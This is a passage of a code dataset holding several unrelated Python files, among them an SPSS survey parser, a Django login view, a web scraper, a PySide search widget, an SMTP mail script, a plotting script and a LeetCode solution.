2019/qualification_round/cryptopangrams.py","file_name":"cryptopangrams.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"292151768","text":"import pandas as pd\nimport logging\nfrom collections import OrderedDict\n\nimport rpy2\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects.packages import importr\nimport pandas.rpy.common as com\n\nfrom survey_stats import helpr\n\nrbase = importr('base')\n\n\ndef strip_line(l):\n # type: (str) -> str\n # strip whitespace and trailing period\n # and remove double quotes\n return l.strip().strip('.').replace('\"','').replace(\"'\",\"\")\n\n\nclass ParseSPSSException(Exception):\n pass\n\nclass ParseCDCSurveyException(Exception):\n pass\n\n\ndef parse_fwfcols_spss(spss_file):\n # type: (str) -> OrderedDict\n \"\"\"Extracts dat metadata from CDC YRBS SPSS files\n\n Extracts the col_specs from a CDC YRBS SPSS file. 
The col_specs\n are given as 3-tuples of (var, start, end) for each column in\n the fixed-width dat file.\n\n Args:\n spss_file: SPSS file path or file object\n\n Returns:\n colspecs: an `OrderedDict` colnames as keys, (st,en) as vals\n \"\"\"\n\n def parse_field_span(span):\n \"\"\" parse start and end \"\"\"\n try:\n (st, en) = span.split('-')\n ret = (int(st)-1,int(en))\n except Exception as e:\n raise ParseSPSSException(\"Improperly formed span in SPSS\" +\n \"file! %s -> %s\" % (span, str(e)))\n return ret\n\n # if arg is filename, call self with open fh\n if not getattr(spss_file, 'read', False):\n with open(spss_file, 'r') as fh:\n return parse_fwfcols_spss(fh)\n\n col_specs = OrderedDict()\n widths_flag = False\n # extract fixed-width-field length rows\n for line in spss_file:\n if line.startswith('DATA LIST FILE'):\n widths_flag = True\n continue\n elif widths_flag and line.startswith('EXECUTE'):\n widths_flag = False\n break\n elif widths_flag:\n #parse a line with field widths\n #split on two consec spaces\n widths = strip_line(line).replace('(A)','').split()\n if not len(widths) % 2 == 0:\n raise ParseSPSSException(\"Invalid fixed-width field\" +\n \" definitions on line: %s\" %\n strip_line(line))\n for i in range(0,len(widths),2):\n #iterate through pairs of var, span, and parse\n var = widths[i].lower()\n col_specs[var] = parse_field_span(widths[i+1])\n continue\n else:\n continue\n # - end for line in readline()...\n return col_specs\n\n\ndef parse_surveyvars_spss(spss_file):\n \"\"\"Extracts dat metadata from CDC YRBS SPSS files\n\n Extracts the survey questions and responses from the\n CDC YRBS SPSS file.\n\n Args:\n spss_file: SPSS file path\n\n Returns:\n survey_vars: an OrderedDict with survey variables\n\n The resulting `survey_vars` is an OrderedDict with\n variable names as keys and dict values with fields of\n `question` containing the survey question, and `responses`\n containing a list of tuples of the form (resp_num, resp_label)\n \"\"\"\n # if arg is filename, call self with open fh\n if not getattr(spss_file, 'read', False):\n with open(spss_file, 'r') as fh:\n return parse_surveyvars_spss(fh)\n\n survey_vars = OrderedDict()\n vars_flag = False\n vals_flag = False\n var = None\n vals = []\n # extract fixed-width-field length rows\n for line in spss_file:\n if line.startswith('VARIABLE LABELS'):\n vars_flag = True\n continue\n elif vars_flag and strip_line(line) == '':\n vars_flag = False\n continue\n elif vars_flag:\n #parse variable label\n # and add tuple (var, question/label)\n (var, q) = strip_line(line).split(' ', 1)\n var = var.lower()\n survey_vars[var] = {\n 'question': q,\n 'responses': [],\n 'is_integer': False\n }\n elif line.startswith('VALUE LABELS'):\n vals_flag = True\n vars_flag = False\n vals = []\n var = None\n continue\n elif vals_flag and line.startswith('/.'):\n #save the last var and val lbls\n #reset vals_flag\n survey_vars[var]['responses'] = vals[:]\n survey_vars[var]['is_integer'] = all(x[0].isdigit() for x in vals)\n var = None\n vals = []\n vals_flag = False\n continue\n elif vals_flag and line.strip() == '/':\n # save the last var and val lbls\n # reset\n survey_vars[var]['responses'] = vals[:]\n survey_vars[var]['is_integer'] = all(x[0].isdigit() for x in vals)\n var = None\n vals = []\n continue\n elif vals_flag and not var:\n # set the current var\n var = strip_line(line).lower()\n continue\n elif vals_flag and var:\n #add (num, label) to current list of val labels\n vals.append(tuple(\n strip_line(line).split(' ', 1) ))\n 
continue\n else:\n #default\n continue\n # - end for line in fh.readline()...\n return survey_vars\n\n\nclass ParseCDCSurveyException(Exception):\n pass\n\ndef load_survey(dat_files, svy_cols, svy_vars):\n logging.info('parsing raw survey data: %s' % ','.join(dat_files))\n df = pd.concat(map(lambda dat_f: pd.read_fwf(dat_f,\n colspecs=list(svy_cols.values()),\n names=list(svy_cols.keys()),\n na_values=['.','']),\n dat_files), ignore_index=True, copy=False)\n logging.info('converting survey data to R object')\n rdf = com.convert_to_r_dataframe(df)\n logging.info('coercing variables to annotated types')\n for q, v in svy_vars.items():\n if v['is_integer']:\n (codes, cats) = zip(*v['responses'])\n idx = rdf.colnames.index(q)\n fac = rdf[idx]\n try:\n fac = rbase.as_integer(fac)\n fac = rbase.factor(fac, levels=list(codes), labels=list(cats))\n rdf[idx] = fac\n except:\n logging.error(rbase.summary(rdf[idx]))\n logging.error(helpr.factor_summary(rdf[idx]))\n logging.error(rbase.summary(fac))\n bt.send_last_exception()\n raise ParseCDCSurveyException('parsing problems: %s -> %s'\n % (q, v))\n elif q.startswith('qn'):\n idx = rdf.colnames.index(q)\n fac = rbase.as_integer(rdf[idx])\n coerced = rbase.is_na(fac)\n n_coerced = rbase.sum(coerced)[0]\n if n_coerced > 0:\n coerced = helpr.factor_summary(rdf[idx].rx(coerced))\n logging.warning('Coerced non-numeric values for variable:' +\n ' %s\\n%s' % (q, coerced))\n if rbase.min(fac, na_rm=True)[0] < 1 or \\\n rbase.max(fac, na_rm=True)[0] > 2:\n raise ParseCDCSurveyException('Found invalid levels for' +\n ' boolean var: %s -> %s' %\n (q, helpr.factor_summary(fac)))\n rdf[idx] = helpr.tobool(fac)\n return rdf\n\n'''\ndef load_survey_py(dat_file, svy_cols, svy_vars):\n df = pd.read_fwf(dat_file, colspecs=list(svy_cols.values()),\n names=list(svy_cols.keys()), na_values=['.',''])\n logging.info('Parsed raw survey data')\n for q, v in svy_vars.items():\n if v['is_integer']:\n (codes, cats) = zip(*v['responses'])\n try:\n df[q] = pd.Categorical.from_codes(df[q].fillna(-1),\n categories=list(cats),\n ordered=True)\n except:\n logging.error(df[q].describe())\n raise ParseCDCSurveyException('parsing problems: %s -> %s'\n % (q, v))\n elif q.startswith(BOOLEAN_RESPONSE_PREFIX):\n idx = rdf.colnames.index(q)\n fac = rbase.as_integer(rdf[idx])\n coerced = rbase.is_na(fac)\n n_coerced = rbase.sum(coerced)[0]\n if n_coerced > 0:\n coerced = helpr.factor_summary(rdf[idx].rx(coerced))\n logging.warning('Coerced non-numeric values for variable:' +\n ' %s\\n%s' % (q, coerced))\n if rbase.min(fac, na_rm=True)[0] < 1 or \\\n rbase.max(fac, na_rm=True)[0] > 2:\n raise ParseCDCSurveyException('Found invalid levels for' +\n ' boolean var: %s -> %s' %\n (q, helpr.factor_summary(fac)))\n rdf[idx] = tobool(fac)\n rdf = com.convert_to_r_dataframe(df)\n logging.info('Converted survey data to R object')\n return rdf\n'''\n","sub_path":"src/survey_stats/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393009174","text":"import datetime\nfrom urllib.parse import urlparse\n\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import DetailView\nfrom django.views.generic.edit import UpdateView\nfrom django.contrib import messages\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.cache import 
never_cache\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.contrib.auth import REDIRECT_FIELD_NAME, login as auth_login\nfrom django.contrib.sites.models import get_current_site\nfrom django.conf import settings\n\nfrom utils.views import LoginRequiredMixin\n\nfrom ..user_log.helpers import user_log\nfrom ..reg_edoc.models import EDoc\n\nfrom .forms import ProfileUpdateForm, YPAuthenticationForm\nfrom .models import YPUser\n\n\nclass ProfileUpdateView(LoginRequiredMixin, UpdateView):\n template_name = 'accounts/profile_form.html'\n form_class = ProfileUpdateForm\n model = YPUser\n\n def get_success_url(self):\n user_log(self.request.user, 'Пользовательские данные обновленны.')\n messages.success(self.request, 'Профиль отредактирован')\n return reverse('profile')\n\n def get_object(self):\n return self.request.user\n\n\nclass ProfileDetailView(LoginRequiredMixin, DetailView):\n template_name = 'accounts/profile_detail.html'\n model = YPUser\n context_object_name = 'profile'\n\n def get_object(self):\n return self.request.user\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['latest_uploaded_edocs'] = EDoc.objects.filter(\n user=self.get_object()).order_by('-modified')[:3]\n context['private'] = True\n return context\n\n\n@sensitive_post_parameters()\n@csrf_protect\n@never_cache\ndef login(request, template_name='registration/login.html',\n redirect_field_name=REDIRECT_FIELD_NAME,\n authentication_form=YPAuthenticationForm,\n current_app=None, extra_context=None):\n \"\"\"\n Displays the login form and handles the login action.\n\n \"\"\"\n redirect_to = request.REQUEST.get(redirect_field_name, '')\n\n if request.method == \"POST\":\n form = authentication_form(data=request.POST)\n if form.is_valid():\n netloc = urlparse(redirect_to)[1]\n # Use default setting if redirect_to is empty\n if not redirect_to:\n redirect_to = settings.LOGIN_REDIRECT_URL\n\n # Heavier security check -- don't allow redirection to a different\n # host.\n elif netloc and netloc != request.get_host():\n redirect_to = settings.LOGIN_REDIRECT_URL\n\n # Okay, security checks complete. 
Log the user in.\n auth_login(request, form.get_user())\n\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n\n # Set domain cookie\n response = HttpResponseRedirect(redirect_to)\n max_age = 365 * 24 * 60 * 60\n expires = datetime.datetime.strftime(\n datetime.datetime.utcnow() + datetime.timedelta(\n seconds=max_age),\n '%a, %d-%b-%Y %H:%M:%S GMT')\n response.set_cookie('unified_domain',\n form.cleaned_data.get('domain'),\n max_age=max_age,\n expires=expires)\n\n # удаляем cookie поиска, филтра по тематикам и сортировки\n response.delete_cookie('user_gallery_search_query')\n response.delete_cookie('user_gallery_filter_by_subject')\n response.delete_cookie('user_gallery_sort_by')\n response.delete_cookie('user_gallery_sort_by_popularity')\n response.delete_cookie('user_gallery_sort_by_num-edocs')\n response.delete_cookie('user_gallery_sort_by_date')\n\n return response\n else:\n form = authentication_form(request)\n\n request.session.set_test_cookie()\n\n current_site = get_current_site(request)\n\n context = {\n 'form': form,\n redirect_field_name: redirect_to,\n 'site': current_site,\n 'site_name': current_site.name,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n return render(request, template_name, context, current_app=current_app)\n","sub_path":"apps/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185895576","text":"from secrets import (cookie, urls, single_url)\nfrom writer import (main,)\nfrom utils import (clean_message_string,)\nfrom uuid import uuid4\nfrom bs4 import BeautifulSoup\nimport requests\n\nrows = []\n\ndef guac():\n taco_id = 1\n for url in single_url:\n r = requests.get(url, cookies=cookie)\n data = r.text\n soup = BeautifulSoup(data, 'html.parser')\n tacos = soup.findAll('li', attrs={'class': 'item'})\n for taco in tacos:\n # Capture HTML for .who div\n who_div = taco.find('div', attrs={'class': 'who'})\n\n # Capture elements containing giver/receiver data\n who_elements = who_div.findAll('a', attrs={'class': 'view-profile'})\n\n # Capture/clean giver/reciever handles\n recipient = str(who_elements[0]['data-name'])\n sender = str(who_elements[1]['title'].split(' ')[0])\n\n # Capture HTML for .message div\n message_div = taco.find('div', attrs={'class': 'message'})\n message_id = str(uuid4())\n\n # Capture and clean message content\n # message = str(message_div.text).strip('\\n').replace(' ', '')\n try:\n message = clean_message_string(str(message_div.text))\n except:\n message = 'Message not available'\n\n hashtags = []\n for word in message.split(' '):\n if '#' in word:\n hashtags.append(word)\n\n taco_tally = []\n\n try:\n for c in message_div.contents:\n try:\n if str(c['title']) == 'taco':\n taco_tally.append('taco')\n except:\n continue\n except:\n pass\n\n current = (taco_id, message_id, sender, str(recipient), message,)\n if hashtags:\n for tag in hashtags:\n current = (taco_id, message_id, sender, str(recipient), message,)\n current += (tag,)\n current += (len(taco_tally),)\n rows.append(current)\n taco_id += 1\n else:\n current += ('None',)\n current += (len(taco_tally),)\n rows.append(current)\n taco_id += 1\n\n\nif __name__ == '__main__':\n guac()\n main(rows)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"641613813","text":"# PySide imports\nfrom PySide import QtGui\n\n# hfx2 imports\nfrom SimpleInputs import StringWidget\n\n\nclass SearchBar(StringWidget):\n \"\"\"\n Search bar for the hfx framework.\n \"\"\"\n\n def __init__(self, parent, icon=None):\n super(SearchBar, self).__init__(parent, name='Search', icon=icon)\n\n # current focus\n self._focus = None\n\n # bindings\n self.returnPressed.connect(self.searchFor)\n QtGui.qApp.focusChanged.connect(self.focusTrack)\n\n def _display(self):\n \"\"\"\n private\n :return:\n \"\"\"\n if self._focus:\n self.setPlaceholderText('Search %s' % self._focus.__class__.__name__)\n else:\n self.setPlaceholderText('Search Widgets (%s)' % str(len(self.searchableWidgets())))\n\n def focusTrack(self, old, new):\n self._focus = None\n\n for topLevel in QtGui.qApp.topLevelWidgets():\n for child in topLevel.children():\n if isinstance(child, SearchBar):\n continue\n try:\n if child.isAncestorOf(new):\n self._focus = child\n self._display()\n return\n except (TypeError, AttributeError):\n pass\n self._display()\n\n def searchableWidgets(self):\n \"\"\"\n Get a list of searchable widgets.\n :return:\n \"\"\"\n validWidgets = []\n\n # loop over children\n for child in self.parent().children():\n if not hasattr(child, 'search') or isinstance(child, SearchBar):\n continue\n validWidgets.append(child)\n\n return validWidgets\n\n def searchFor(self, value=None):\n \"\"\"\n Search for a value.\n :param value:\n :return:\n \"\"\"\n if not value:\n value = self.text()\n\n if self._focus:\n if hasattr(self._focus, 'search'):\n self._focus.search(value)\n else:\n for widget in self.searchableWidgets():\n widget.search(value)","sub_path":"hfx2/gui/widgets/Searching.py","file_name":"Searching.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"567152908","text":"import re\nimport sys\ndef main():\n\ttry:\n\t\tf = open(sys.argv[1], \"r\")\n\texcept IndexError:\n\t\tprint(\"File name not specified in command line argument. Correct usage python3 assignment3.py \\n\")\n\t\texit()\n\texcept FileNotFoundError:\n\t\tprint(\"File does not exist. 
Please enter an existing file name and try again.\\n\")\n\t\texit()\n\ttext = f.read()\n\tinputs = re.split(' ', text)\n\tdata = []\n\tfor i in range(len(inputs)):\n\t\tif not '\\n' in inputs[i]:\n\t\t\tdata.append(inputs[i])\n\t#print(data)\n\tfunigram = open(\"unigram.txt\", \"w\")\n\tfbigram = open(\"bigram.txt\", \"w\")\n\tftrigram = open(\"trigram.txt\", \"w\")\n\tffourgram = open(\"fourgram.txt\", \"w\")\n\tffivegram = open(\"fivegram.txt\", \"w\")\n\tfor i in range(len(data)):\n\t\tfunigram.write(data[i] + \"\\n\")\n\t\t#funigram.write(\"\\n\")\n\tfor i in range(len(data) - 1):\n\t\tfbigram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\n\")\n\tfor i in range(len(data) - 2):\n\t\tftrigram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\t\\t\\t\" + data[i + 2] + \"\\n\")\n\tfor i in range(len(data) - 3):\n\t\tffourgram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\t\\t\\t\" + data[i + 2] + \"\\t\\t\\t\" + data[i + 3] + \"\\n\")\n\tfor i in range(len(data) - 4):\n\t\tffivegram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\t\\t\\t\" + data[i + 2] + \"\\t\\t\\t\" + data[i + 3] + \"\\t\\t\\t\" + data[i + 4] + \"\\n\")\n\tffivegram.close()\n\tffourgram.close()\n\tftrigram.close()\n\tfbigram.close()\n\tfunigram.close()\n\tf.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"assignment3/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"267987787","text":"# -*- coding: utf-8 -*-\n\nimport web\n\nimport binascii\nimport time\nimport email\nimport mimetypes\nfrom settings import THEME_TEMPLATE_DIR\n\nfrom theme.models import ThemeFile\n\nfrom google.appengine.api import memcache\n\nclass theme_file(object):\n    \"\"\"Theme template file handling\"\"\"\n    def GET(self, theme, filename):\n        mime_type, encoding = mimetypes.guess_type(filename)\n        if not mime_type:\n            mime_type = 'application/octet-stream'\n        \n        memcache_key = 'theme:%s:%s' % (theme, filename)\n        body = memcache.get(memcache_key)\n        \n        if not body:\n            theme_file_query = ThemeFile.all().filter('theme_name =', theme)\n            theme_file_query.filter('filename =', filename)\n            theme_file_query.filter('filetype =', 'file')\n            f = theme_file_query.get()\n            \n            if not f:\n                raise web.notfound()\n            \n            body = str(f.filecontent)\n            memcache.set(memcache_key, body)\n        \n        etag = str(binascii.crc32(body))\n        self.SetCacheHeader(etag)\n        \n        match = web.ctx.env.get('HTTP_IF_NONE_MATCH')\n        if match and match == etag:\n            raise web.notmodified()\n        web.header('Content-Type', mime_type)\n        return body\n        # theme_path = os.path.join(THEME_TEMPLATE_DIR, theme)\n        # if os.path.isdir(theme_path):\n        #     try:\n        #         filename = os.path.join(theme_path, filename)\n        #         f = open(filename, 'rb')\n        #         body = f.read()\n        #         f.close()\n        #         etag = str(binascii.crc32(body))\n        #         self.SetCacheHeader(etag)\n        #         \n        #         match = web.ctx.env.get('HTTP_IF_NONE_MATCH')\n        #         if match and match == etag:\n        #             raise web.notmodified()\n        #     except IOError:\n        #         body = None\n        # else:\n        #     body = None\n    \n        # if not body:\n        #     raise web.notfound()\n    \n    MAX_AGE = 86400\n    \n    def SetCacheHeader(self, etag=None):\n        \"\"\"Cache control\"\"\"\n        web.header('Expires', email.Utils.formatdate(\n            time.time() + self.MAX_AGE, usegmt=True))\n        web.header('Cache-Control', 'public, max-age=%d' % self.MAX_AGE)\n        if etag:\n            web.header('ETag', 
etag)\n","sub_path":"theme/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"16832297","text":"#!/usr/bin/python3\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nf2=open(\"2e_marche.csv\",\"r\")\nfp=open(\"prevision.csv\",\"r\")\nfs=open(\"simple.csv\",\"r\")\nfr=open(\"reserve.csv\",\"r\")\n\ncout_social=[[],[],[],[]]\ncout_social_t=[]\nprix=[[],[],[],[]]\nprix_t=[]\necart_type=[]\necart_type_t=[]\nreserve=[]\nprix_ecart_type=np.array([])\ncout_ecart_type=np.array([])\n\n\n\nfor ligne in fs:\n\tp=np.asfarray(ligne.split(\";\"))\n\tcout_social[0].append(np.sum(p[1:]))\n\tprix[0].append(p[0])\n\nfor ligne in fr:\n\tp=np.asfarray(ligne.split(\";\"))\n\treserve.append(p[0])\n\tcout_social[1].append(np.sum(p[2:]))\n\tprix[1].append(p[1])\n\t\nfor ligne in fp:\n\tp=np.asfarray(ligne.split(\";\"))\n\tcout_social[2].append(np.sum(p[1:]))\n\tprix[2].append(p[0])\n\t\nfor ligne in f2:\n\tp=np.asfarray(ligne.split(\";\"))\n\tecart_type_t.append(p[0])\n\tcout_social_t.append(np.sum(p[2:]))\n\tprix_t.append(p[1])\n\nn_et=0\nwhile ecart_type_t[n_et]==ecart_type_t[0]:\n\tn_et+=1\n\necart_type=ecart_type_t[::n_et]\ncout_social[3] = np.mean(np.split(np.array(cout_social_t),\n\t\t\t\tlen(cout_social_t)/n_et), axis=1)\ncout_ecart_type = np.std(np.split(np.array(cout_social_t),\n\t\t\t\tlen(cout_social_t)/n_et), axis=1)\nprix[3] = np.mean(np.split(np.array(prix_t),\n\t\t\t\tlen(prix_t)/n_et), axis=1)\nprix_ecart_type = np.std(np.split(np.array(prix_t),\n\t\t\t\tlen(prix_t)/n_et), axis=1)\n\nplt.plot(reserve,prix[1],label=\"1er prix avec réserve\")\nplt.plot(reserve,[prix[0][0] for i in range(len(prix[1]))],label=\"1er prix sans réserve\")\nplt.plot(reserve,[prix[2][0] for i in range(len(prix[1]))],label=\"1er prix avec estimation des incertitudes\")\nplt.legend()\nplt.title(\"prix=f(reserve)\")\nplt.figure()\n\nplt.plot(reserve,cout_social[1],label=\"1er coût social avec réserve\")\nplt.plot(reserve,[cout_social[0][0] for i in range(len(cout_social[1]))],label=\"1er coût sans réserve\")\nplt.plot(reserve,[cout_social[2][0] for i in range(len(cout_social[1]))],label=\"1er coût avec estimation des incertitudes\")\nplt.legend()\nplt.title(\"cout social=f(reserve)\")\nplt.figure()\n\nplt.plot(ecart_type,prix[3],label=\"prix moyen\")\nplt.plot(ecart_type,np.array(prix[3])+prix_ecart_type,label=\"prix moyen+écart type prix\")\nplt.plot(ecart_type,np.array(prix[3])-prix_ecart_type,label=\"prix moyen-écart type prix\")\nplt.title(\"prix=f(ecart_type)\")\nplt.legend()\nplt.figure()\n\nplt.plot(ecart_type,cout_social[3],label=\"cout social moyen\")\nplt.plot(ecart_type,np.array(cout_social[3])+cout_ecart_type,label=\"coût moyen+écart type coût\")\nplt.plot(ecart_type,np.array(cout_social[3])-cout_ecart_type,label=\"coût moyen-écart type coût\")\nplt.title(\"cout social=f(ecart_type)\")\nplt.legend()\n#plt.figure()\n\nplt.show()\n\nf2.close()\nfp.close()\nfr.close()\nfs.close()\n","sub_path":"disp_cout.py","file_name":"disp_cout.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"541033769","text":"\"\"\"\r\n\n\nCreate a function which replaces all the x's in the string in the following\nways:\n\nReplace all x's with \"cks\" **UNLESS** :\n\n * The word begins with \"x\", therefore replace it with \"z\".\n * The word is just the letter \"x\", therefore replace it with 
\"ecks\".\n\n### Examples\n\n x_pronounce(\"Inside the box was a xylophone\") ➞ \"Inside the bocks was a zylophone\"\n \n x_pronounce(\"The x ray is excellent\") ➞ \"The ecks ray is eckscellent\"\n \n x_pronounce(\"OMG x box unboxing video x D\") ➞ \"OMG ecks bocks unbocksing video ecks D\"\n\n### Notes\n\n * All x's are lowercase.\n * I know that not all words with x's follow this rule, but there are too many edge cases to count!\n\n\"\"\"\r\n\ndef x_pronounce(sentence):\n sentence2 = ''\n for i in range(0,len(sentence),1):\n if sentence[i]=='x' and sentence[i-1]==' ' and sentence[i+1]==' ':\n sentence2 += 'ecks'\n elif sentence[i]=='x' and sentence[i-1]==' ':\n sentence2 += 'z'\n elif sentence[i]=='x':\n sentence2 += 'cks'\n else:\n sentence2 += sentence[i]\n return sentence2\n\n","sub_path":"bfz7kTgPujtfcHR9d_2.py","file_name":"bfz7kTgPujtfcHR9d_2.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"213938411","text":"'''\n493. Reverse Pairs\nHard\nGiven an array nums, we call (i, j) an important reverse pair if i < j and nums[i] > 2*nums[j].\nYou need to return the number of important reverse pairs in the given array.\nExample1:\nInput: [1,3,2,3,1]\nOutput: 2\nExample2:\nInput: [2,4,3,5,1]\nOutput: 3\n'''\n\nimport collections\n\ndef Combinations_recur(lst,cnt,tmp,fnl_lst):\n\n if len(tmp)==2:\n if ''.join(sorted(tmp)) in fnl_lst.keys():\n fnl_lst[''.join(sorted(tmp))].append(tmp.copy())\n else:\n fnl_lst[''.join(sorted(tmp))]=[]\n fnl_lst[''.join(sorted(tmp))].append(tmp.copy())\n\n\n for i in range(0,len(lst)):\n if cnt[i]==0:\n continue\n tmp.append(str(lst[i]))\n cnt[i]=cnt[i]-1\n Combinations_recur(lst, cnt, tmp, fnl_lst)\n tmp.pop()\n cnt[i]=cnt[i]+1\n\ndef LeetCode493(ary):\n\n dict=collections.Counter(ary)\n lst=[]\n cnt=[]\n for key,val in dict.items():\n lst.append(key)\n cnt.append(val)\n tmp=[]\n fnl_lst={}\n Combinations_recur(lst,cnt,tmp,fnl_lst)\n\n cnt=0\n for key,val in fnl_lst.items():\n sample_ary=ary.copy()\n for tup in val:\n idx_lst=[]\n flg=True\n for l in tup:\n try:\n idx=sample_ary.index(int(l))\n idx_lst.append(idx)\n sample_ary[idx]=-9999\n except:\n flg=False\n if flg==True:\n if sorted(idx_lst)==idx_lst and ary[idx_lst[0]]>2*ary[idx_lst[1]]:\n cnt=cnt+1\n return cnt\n\ndef main():\n\n ary=[1,3,2,3,1]\n print(LeetCode493(ary))\n\n ary = [2,4,3,5,1]\n print(LeetCode493(ary))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/LeetCode493.py","file_name":"LeetCode493.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"210874568","text":"import smtplib\nimport sys\n\nif len(sys.argv != 2):\n print(\"Failed\")\n\nsmtpObj = smtplib.SMTP(\"smtp.naver.com\", 587)\n\nehloResult = smtpObj.ehlo()\nif ehloResult[0] != 250:\n\tprint(\"Failed\")\n\nstarttlsResult = smtpObj.starttls()\nif starttlsResult[0] != 220:\n\tprint(\"Failed\")\n\nloginResult = smtpObj.login(\"oniang@naver.com\", sys.argv[1])\nif loginResult[0] != 235:\n\tprint(\"Failed\")\n\nprint(\"To whom you want to send an email?:\", end=\" \")\nrecipient = input()\n\nprint(\"Subject:\", end=\" \")\nsubject = input()\n\nprint(\"Body:\", end=\" \")\nbody = input()\n\nmsg = \"From: Bonzniak \\nTo: \" + recipient + \"\\nSubject: \" + subject +\"\\n\\n\" + body\nprint(\"\\n<>\\n\" + msg)\n\nsendmailResult = smtpObj.sendmail(\"oniang@naver.com\", recipient, msg)\nif sendmailResult != 
{}:\n\tprint(\"Sending the mail failed\")\n\nquitResult = smtpObj.quit()\nif quitResult[0] != 221:\n\tprint(\"Quitting failed\")\n","sub_path":"sh_scrpt/naverMail.py","file_name":"naverMail.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"76126488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#############################################################################\n##\n## OnAirScreen Analog\n## Copyright (C) 2013 Sascha Ludwig\n## All rights reserved.\n##\n## settings_functions.py\n## This file is part of OnAirScreen\n##\n## You may use this file under the terms of the BSD license as follows:\n##\n## \"Redistribution and use in source and binary forms, with or without\n## modification, are permitted provided that the following conditions are\n## met:\n##   * Redistributions of source code must retain the above copyright\n##     notice, this list of conditions and the following disclaimer.\n##   * Redistributions in binary form must reproduce the above copyright\n##     notice, this list of conditions and the following disclaimer in\n##     the documentation and/or other materials provided with the\n##     distribution.\n##\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\"\n##\n#############################################################################\n\nfrom PyQt4.QtGui import QApplication, QWidget, QCursor, QPalette, QColorDialog, QColor, QShortcut, QKeySequence, QFileDialog\nfrom PyQt4.QtCore import SIGNAL, QSettings, QCoreApplication, QTimer, QObject, QVariant, pyqtSignal\nfrom PyQt4.QtNetwork import QUdpSocket, QHostAddress, QHostInfo, QNetworkInterface\nfrom settings import Ui_Settings\nfrom collections import defaultdict\nimport json\n\nversionString = \"0.7\"\n\n# class OASSettings for use from OAC\nclass OASSettings():\n    def __init__(self):\n        self.config = defaultdict(dict)\n        self.currentgroup = None\n\n    def beginGroup(self, group):\n        self.currentgroup = group\n\n    def endGroup(self):\n        self.currentgroup = None\n\n    def setValue(self, name, value):\n        if self.currentgroup:\n            self.config[self.currentgroup][name] = unicode(value)\n        pass\n\n    def value(self, name, default=None):\n        try:\n            return QVariant(self.config[self.currentgroup][name])\n        except KeyError:\n            return QVariant(default)\n\nclass Settings(QWidget, Ui_Settings):\n    sigConfigChanged = pyqtSignal(int, unicode)\n    sigExitOAS = pyqtSignal()\n    sigRebootHost = pyqtSignal()\n    sigShutdownHost = pyqtSignal()\n    sigConfigFinished = pyqtSignal()\n    sigExitRemoteOAS = pyqtSignal(int)\n    sigRebootRemoteHost = pyqtSignal(int)\n    sigShutdownRemoteHost = pyqtSignal(int)\n    def __init__(self, oacmode=False):\n        self.row = -1\n        QWidget.__init__(self)\n        Ui_Settings.__init__(self)\n        